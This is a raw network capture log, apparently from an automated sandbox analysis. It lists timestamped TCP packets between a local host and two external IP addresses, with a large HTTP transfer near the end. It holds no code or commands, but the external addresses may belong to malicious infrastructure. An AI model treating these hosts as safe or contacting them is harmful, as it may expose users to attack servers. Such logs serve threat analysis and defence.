Sep 20, 2024 11:07:50.981834888 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.981869936 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.981878042 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.981893063 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.981920004 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.982683897 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.982731104 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.982755899 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.982763052 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.982777119 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.982794046 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.992620945 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.992675066 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.992846966 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.992861032 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.992904902 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.999933004 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.999977112 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:51.000020027 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:51.000031948 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:51.000053883 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:51.000070095 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:51.015769958 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:51.015815020 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:51.015841961 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:51.015852928 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:51.015867949 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:51.015888929 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:51.034434080 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:51.034478903 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:51.034523010 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:51.034544945 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:51.034559965 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:51.034579039 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:51.066399097 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:51.066442013 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:51.066553116 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:51.066569090 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:51.066601038 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:51.066613913 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:51.067195892 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:51.067238092 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:51.067267895 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:51.067276955 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:51.067306995 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:51.067315102 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:51.067656040 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:51.067699909 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:51.067713022 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:51.067720890 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:51.067747116 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:51.067759037 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:51.068438053 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:51.068479061 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:51.068504095 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:51.068510056 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:51.068530083 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:51.068546057 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:51.079004049 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:51.079047918 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:51.079096079 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:51.079104900 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:51.079144001 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:51.087606907 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:51.087649107 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:51.087678909 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:51.087686062 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:51.087703943 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:51.087718010 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:51.104029894 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:51.104077101 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:51.104142904 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:51.104161024 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:51.104316950 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:51.104316950 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:51.121342897 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:51.121387959 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:51.121450901 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:51.121459007 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:51.121474028 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:51.121493101 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:51.153573990 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:51.153646946 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:51.153739929 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:51.153759956 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:51.153759956 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:51.153785944 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:51.154011965 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:51.154026031 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:51.410315037 CEST	49755	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:51.410368919 CEST	443	49755	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:51.410465956 CEST	49755	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:51.410722017 CEST	49755	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:51.410737038 CEST	443	49755	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:52.144305944 CEST	443	49755	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:52.144396067 CEST	49755	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:52.168494940 CEST	49755	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:52.168505907 CEST	443	49755	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:52.193814039 CEST	49755	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:52.193820953 CEST	443	49755	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:52.193839073 CEST	49755	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:52.193844080 CEST	443	49755	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:52.737560034 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:52.737611055 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:52.739407063 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:52.739964962 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:52.739975929 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:52.921416044 CEST	443	49755	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:52.921513081 CEST	443	49755	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:52.921560049 CEST	49755	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:52.921585083 CEST	49755	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:52.922542095 CEST	49755	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:52.922563076 CEST	443	49755	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:53.384490967 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:53.384680033 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:53.385020018 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:53.385035992 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:53.387307882 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:53.387322903 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:54.066302061 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:54.066325903 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:54.066380024 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:54.066450119 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:54.066494942 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:54.066867113 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:54.066885948 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:54.069636106 CEST	49757	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:54.069680929 CEST	443	49757	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:54.069762945 CEST	49757	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:54.070023060 CEST	49757	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:54.070038080 CEST	443	49757	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:54.725652933 CEST	443	49757	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:54.725759983 CEST	49757	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:54.726243973 CEST	49757	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:54.726252079 CEST	443	49757	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:54.728275061 CEST	49757	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:54.728281021 CEST	443	49757	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:55.443438053 CEST	443	49757	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:55.443520069 CEST	443	49757	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:55.443563938 CEST	49757	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:55.443584919 CEST	443	49757	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:55.443598032 CEST	49757	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:55.443628073 CEST	49757	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:55.443655968 CEST	443	49757	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:55.443708897 CEST	49757	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:55.443954945 CEST	49757	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:55.443969965 CEST	443	49757	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:55.463084936 CEST	49758	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:55.463115931 CEST	443	49758	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:55.463186979 CEST	49758	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:55.463402033 CEST	49758	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:55.463411093 CEST	443	49758	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:56.111015081 CEST	443	49758	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:56.111092091 CEST	49758	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:56.111697912 CEST	49758	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:56.111707926 CEST	443	49758	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:56.117765903 CEST	49758	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:56.117773056 CEST	443	49758	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:56.789829969 CEST	443	49758	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:56.789938927 CEST	49758	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:56.790107012 CEST	443	49758	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:56.790160894 CEST	49758	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:56.790174007 CEST	443	49758	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:56.790211916 CEST	49758	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:56.790251970 CEST	443	49758	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:56.790298939 CEST	49758	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:56.790697098 CEST	49758	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:56.790710926 CEST	443	49758	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:57.505743980 CEST	49760	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:57.505783081 CEST	443	49760	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:57.505902052 CEST	49760	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:57.506165981 CEST	49760	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:57.506181955 CEST	443	49760	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:58.156065941 CEST	443	49760	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:58.156198978 CEST	49760	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:58.156742096 CEST	49760	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:58.156755924 CEST	443	49760	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:58.158710957 CEST	49760	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:58.158718109 CEST	443	49760	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:58.158777952 CEST	49760	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:58.158791065 CEST	443	49760	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:58.158797026 CEST	49760	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:58.158803940 CEST	443	49760	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:58.158866882 CEST	49760	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:58.158888102 CEST	443	49760	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:58.158895969 CEST	49760	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:58.158915997 CEST	443	49760	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:58.159022093 CEST	49760	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:58.159041882 CEST	443	49760	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:58.159074068 CEST	49760	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:58.159086943 CEST	443	49760	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:58.159120083 CEST	49760	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:58.159132004 CEST	443	49760	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:58.159446001 CEST	49760	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:58.159470081 CEST	443	49760	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:59.501085043 CEST	443	49760	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:59.501158953 CEST	49760	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:59.501188993 CEST	443	49760	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:59.501266003 CEST	443	49760	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:59.501277924 CEST	49760	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:59.501324892 CEST	49760	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:59.501399994 CEST	49760	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:59.501429081 CEST	443	49760	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:59.504883051 CEST	49761	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:59.504933119 CEST	443	49761	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:59.505055904 CEST	49761	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:59.505280018 CEST	49761	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:59.505290031 CEST	443	49761	116.203.165.127	192.168.2.4
Sep 20, 2024 11:08:00.161557913 CEST	443	49761	116.203.165.127	192.168.2.4
Sep 20, 2024 11:08:00.161642075 CEST	49761	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:08:00.162039042 CEST	49761	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:08:00.162054062 CEST	443	49761	116.203.165.127	192.168.2.4
Sep 20, 2024 11:08:00.164335966 CEST	49761	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:08:00.164355993 CEST	443	49761	116.203.165.127	192.168.2.4
Sep 20, 2024 11:08:00.933168888 CEST	443	49761	116.203.165.127	192.168.2.4
Sep 20, 2024 11:08:00.933317900 CEST	443	49761	116.203.165.127	192.168.2.4
Sep 20, 2024 11:08:00.933346987 CEST	49761	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:08:00.933384895 CEST	49761	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:08:00.933541059 CEST	49761	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:08:00.933562040 CEST	443	49761	116.203.165.127	192.168.2.4
Sep 20, 2024 11:08:00.936373949 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:00.941240072 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:00.941332102 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:00.941457987 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:00.946187019 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.565751076 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.565776110 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.565789938 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.565855980 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.565866947 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.565896034 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.565974951 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.566030979 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.566049099 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.566060066 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.566070080 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.566076994 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.566081047 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.566116095 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.566140890 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.574949026 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.574965000 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.575011969 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.575038910 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.655544043 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.655561924 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.655571938 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.655637980 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.655735016 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.655746937 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.655870914 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.655883074 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.655883074 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.655883074 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.656049967 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.656049967 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.656574011 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.656613111 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.656622887 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.656632900 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.656665087 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.656666040 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.656718016 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.656728983 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.656769991 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.657367945 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.657385111 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.657396078 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.657406092 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.657417059 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.657423973 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.657452106 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.657479048 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.658246994 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.658257961 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.658267975 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.658298016 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.658329010 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.745213032 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.745232105 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.745264053 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.745274067 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.745285988 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.745296955 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.745297909 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.745297909 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.745309114 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.745379925 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.745379925 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.745554924 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.745583057 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.745594025 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.745603085 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.745608091 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.745619059 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.745629072 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.745630026 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.745651960 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.745681047 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.746377945 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.746390104 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.746401072 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.746448994 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.746448994 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.746454954 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.746470928 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.746481895 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.746494055 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.746514082 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.746546984 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.747612000 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.747622013 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.747633934 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.747643948 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.747659922 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.747663975 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.747669935 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.747683048 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.747694016 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.747723103 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.748269081 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.748281002 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.748296022 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.748307943 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.748317957 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.748327971 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.748327971 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.748359919 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.748388052 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.835406065 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.835445881 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.835469007 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.835485935 CEST	80	49762	147.45.44.104	192.168.2.4
